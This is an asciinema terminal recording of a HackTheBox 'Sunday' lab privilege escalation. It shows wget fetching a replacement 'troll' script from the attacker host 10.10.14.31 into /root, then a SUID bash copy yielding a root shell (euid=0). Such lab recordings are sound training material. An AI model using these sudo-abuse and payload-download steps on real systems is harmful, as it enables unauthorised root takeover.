[81.340602, "o", "\u001b[?25l\u001b[1;118H\u001b[32m│\u001b[2;118H│\u001b[3;118H│\u001b[4;118H│\u001b[5;118H│\u001b[6;118H│\u001b[7;118H│\u001b[8;118H│\u001b[9;118H│\u001b[10;118H│\u001b[11;118H│\u001b[12;118H│\u001b[13;118H│\u001b[14;118H│\u001b[15;118H│\u001b[16;118H│\u001b[17;118H│\u001b[18;118H│\u001b[19;118H│\u001b[20;118H│\u001b[21;118H│\u001b[22;118H│\u001b[23;118H│\u001b[24;118H│\u001b[25;118H│\u001b[26;118H│\u001b[27;118H│\u001b[28;118H│\u001b[29;118H│\u001b[30;118H│\u001b[31;118H│\u001b[32;118H│\u001b[33;118H│\u001b[34;118H│\u001b[35;118H│\u001b[36;118H│\u001b[37;118H│\u001b[38;118H│\u001b[39;118H│\u001b[40;118H│\u001b[41;118H│\u001b[42;118H│\u001b[43;118H│\u001b[44;118H│\u001b[45;118H│\u001b[46;118H│\u001b[47;118H│\u001b[48;118H│\u001b[49;118H│\u001b[50;118H│\r\n\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m┤\u001b[52;118H│\u001b[53;118H│\u001b[54;118H│\u001b[55;118H│\u001b[56;118"]
[81.340649, "o", "H│\u001b[57;118H│\u001b[58;118H│\u001b[59;118H│\u001b[60;118H│\u001b[61;118H│\u001b[62;118H│\u001b[63;118H│\u001b[64;118H│\u001b[65;118H│\u001b[66;118H│\u001b[67;118H│\u001b[68;118H│\u001b[69;118H│\u001b[70;118H│\u001b[71;118H│\u001b[72;118H│\u001b[73;118H│\u001b[74;118H│\u001b[75;118H│\u001b[76;118H│\u001b[77;118H│\u001b[78;118H│\u001b[79;118H│\u001b[80;118H│\u001b[81;118H│\u001b[82;118H│\u001b[83;118H│\u001b[84;118H│\u001b[85;118H│\u001b[86;118H│\u001b[87;118H│\u001b[88;118H│\u001b[89;118H│\u001b[90;118H│\u001b[91;118H│\u001b[92;118H│\u001b[93;118H│\u001b[94;118H│\u001b[95;118H│\u001b[96;118H│\u001b[97;118H│\u001b[98;118H│\u001b[99;118H│\u001b[100;118H│\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[8;135H"]
[83.071532, "o", "s"]
[83.166334, "o", "u"]
[83.264034, "o", "d"]
[83.348606, "o", "o"]
[83.467132, "o", " "]
[83.588981, "o", "/"]
[83.720971, "o", "r"]
[83.848943, "o", "o"]
[84.005232, "o", "o"]
[84.120975, "o", "t"]
[84.261746, "o", "/"]
[84.362288, "o", "t"]
[84.517546, "o", "r"]
[84.575253, "o", "o"]
[84.758855, "o", "l"]
[84.888196, "o", "l"]
[85.038244, "o", " "]
[85.382879, "o", "\b \b"]
[85.527344, "o", ";"]
[86.056355, "o", " "]
[86.151809, "o", "c"]
[86.552257, "o", "\b \b"]
[86.830951, "o", "/"]
[86.987418, "o", "t"]
[87.118843, "o", "m"]
[87.179021, "o", "p"]
[87.685433, "o", "/"]
[87.860336, "o", "r"]
[87.986825, "o", "o"]
[88.137104, "o", "o"]
[88.232781, "o", "t"]
[88.347124, "o", "b"]
[88.473926, "o", "a"]
[88.518994, "o", "s"]
[88.570114, "o", "h"]
[88.760732, "o", " "]
[88.839115, "o", "-"]
[89.007975, "o", "p"]
[92.549426, "o", "\u001b[?25l\u001b[1;118H\u001b[32m│\u001b[2;118H│\u001b[3;118H│\u001b[4;118H│\u001b[5;118H│\u001b[6;118H│\u001b[7;118H│\u001b[8;118H│\u001b[9;118H│\u001b[10;118H│\u001b[11;118H│\u001b[12;118H│\u001b[13;118H│\u001b[14;118H│\u001b[15;118H│\u001b[16;118H│\u001b[17;118H│\u001b[18;118H│\u001b[19;118H│\u001b[20;118H│\u001b[21;118H│\u001b[22;118H│\u001b[23;118H│\u001b[24;118H│\u001b[25;118H│\u001b[26;118H│\u001b[27;118H│\u001b[28;118H│\u001b[29;118H│\u001b[30;118H│\u001b[31;118H│\u001b[32;118H│\u001b[33;118H│\u001b[34;118H│\u001b[35;118H│\u001b[36;118H│\u001b[37;118H│\u001b[38;118H│\u001b[39;118H│\u001b[40;118H│\u001b[41;118H│\u001b[42;118H│\u001b[43;118H│\u001b[44;118H│\u001b[45;118H│\u001b[46;118H│\u001b[47;118H│\u001b[48;118H│\u001b[49;118H│\u001b[50;118H│\r\n─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;118H\u001b[39m│\u001b[53;118H│\u001b[54;118H│\u001b[55;118H│\u001b[56;118H│\u001b"]
[92.549518, "o", "[57;118H│\u001b[58;118H│\u001b[59;118H│\u001b[60;118H│\u001b[61;118H│\u001b[62;118H│\u001b[63;118H│\u001b[64;118H│\u001b[65;118H│\u001b[66;118H│\u001b[67;118H│\u001b[68;118H│\u001b[69;118H│\u001b[70;118H│\u001b[71;118H│\u001b[72;118H│\u001b[73;118H│\u001b[74;118H│\u001b[75;118H│\u001b[76;118H│\u001b[77;118H│\u001b[78;118H│\u001b[79;118H│\u001b[80;118H│\u001b[81;118H│\u001b[82;118H│\u001b[83;118H│\u001b[84;118H│\u001b[85;118H│\u001b[86;118H│\u001b[87;118H│\u001b[88;118H│\u001b[89;118H│\u001b[90;118H│\u001b[91;118H│\u001b[92;118H│\u001b[93;118H│\u001b[94;118H│\u001b[95;118H│\u001b[96;118H│\u001b[97;118H│\u001b[98;118H│\u001b[99;118H│\u001b[100;118H│\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[10;63H"]
[95.727636, "o", "\r\n"]
[95.750223, "o", "--2022-09-03 16:10:47--  http://10.10.14.31/troll\r\nConnecting to 10.10.14.31:80... "]
[95.79162, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[95.796125, "o", "\u001b[55;1H10.10.10.76 - - [04/Sep/2022 00:10:42] \"GET /troll HTTP/1.1\" 200 -\u001b[13;41H"]
[95.840023, "o", "200 OK\r\nLength: 66 [application/octet-stream]\r\nSaving to: '/root/troll'\u001b[17;1H/root/troll                   100%[==============================================>]      66  --.-KB/s    in 0s      \u001b[19;1H2022-09-03 16:10:48 (4.50 MB/s) - '/root/troll' saved [66/66]\u001b[21;1H"]
[95.843102, "o", "-bash-4.4$ "]
[96.374996, "o", "\u001b[?25l\u001b[1;118H\u001b[32m│\u001b[2;118H│\u001b[3;118H│\u001b[4;118H│\u001b[5;118H│\u001b[6;118H│\u001b[7;118H│\u001b[8;118H│\u001b[9;118H│\u001b[10;118H│\u001b[11;118H│\u001b[12;118H│\u001b[13;118H│\u001b[14;118H│\u001b[15;118H│\u001b[16;118H│\u001b[17;118H│\u001b[18;118H│\u001b[19;118H│\u001b[20;118H│\u001b[21;118H│\u001b[22;118H│\u001b[23;118H│\u001b[24;118H│\u001b[25;118H│\u001b[26;118H│\u001b[27;118H│\u001b[28;118H│\u001b[29;118H│\u001b[30;118H│\u001b[31;118H│\u001b[32;118H│\u001b[33;118H│\u001b[34;118H│\u001b[35;118H│\u001b[36;118H│\u001b[37;118H│\u001b[38;118H│\u001b[39;118H│\u001b[40;118H│\u001b[41;118H│\u001b[42;118H│\u001b[43;118H│\u001b[44;118H│\u001b[45;118H│\u001b[46;118H│\u001b[47;118H│\u001b[48;118H│\u001b[49;118H│\u001b[50;118H│\r\n\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m┤\u001b[52;118H│\u001b[53;118H│\u001b[54;118H│\u001b[55;118H│\u001b[56;118"]
[96.375169, "o", "H│\u001b[57;118H│\u001b[58;118H│\u001b[59;118H│\u001b[60;118H│\u001b[61;118H│\u001b[62;118H│\u001b[63;118H│\u001b[64;118H│\u001b[65;118H│\u001b[66;118H│\u001b[67;118H│\u001b[68;118H│\u001b[69;118H│\u001b[70;118H│\u001b[71;118H│\u001b[72;118H│\u001b[73;118H│\u001b[74;118H│\u001b[75;118H│\u001b[76;118H│\u001b[77;118H│\u001b[78;118H│\u001b[79;118H│\u001b[80;118H│\u001b[81;118H│\u001b[82;118H│\u001b[83;118H│\u001b[84;118H│\u001b[85;118H│\u001b[86;118H│\u001b[87;118H│\u001b[88;118H│\u001b[89;118H│\u001b[90;118H│\u001b[91;118H│\u001b[92;118H│\u001b[93;118H│\u001b[94;118H│\u001b[95;118H│\u001b[96;118H│\u001b[97;118H│\u001b[98;118H│\u001b[99;118H│\u001b[100;118H│\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[8;169H"]
[96.92559, "o", "\u001b[9;119H"]
[96.964066, "o", "rootbash-4.4# "]
[97.798433, "o", "i"]
[98.258992, "o", "d"]
[98.407365, "o", ";"]
[98.606104, "o", "w"]
[98.700332, "o", "h"]
[98.775704, "o", "o"]
[98.920848, "o", "a"]
[98.993653, "o", "m"]
[99.08386, "o", "i"]
[99.695281, "o", "\u001b[10;119H"]
[99.698769, "o", "uid=101(sunny) gid=10(staff) euid=0(root)\u001b[11;119H"]
[99.701682, "o", "root\u001b[12;119H"]
[99.702094, "o", "rootbash-4.4# "]
[101.370362, "o", "c"]
[101.436846, "o", "d"]
[101.548305, "o", " "]
[101.644073, "o", "/"]
[101.801014, "o", "r"]
[101.953959, "o", "o"]
[102.124329, "o", "o"]
[102.207301, "o", "t"]
[102.315933, "o", "\u001b[13;119Hrootbash-4.4# "]
[105.261176, "o", "\u001b[1;101r\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b[?7727l\u001b[?1004l\u001b[?1049l\u001b[23;0;0t"]
[105.261642, "o", "[detached (from session troll)]\r\n"]
[105.261986, "o", "\u001b[?2004h\u001b]0;root@kali: ~/htb/sunday/10.10.10.76/loot/loot\u0007\u001b[;94m┌──(\u001b[1;31mroot💀kali\u001b[;94m)-[\u001b[0;1m~/htb/sunday/10.10.10.76/loot/loot\u001b[;94m]\r\r\n"]
[105.26218, "o", "\u001b[;94m└─\u001b[1;31m#\u001b[0m "]
[107.050212, "o", "\u001b[?2004l\r\r\nexit"]
[107.050512, "o", "\r\n"]
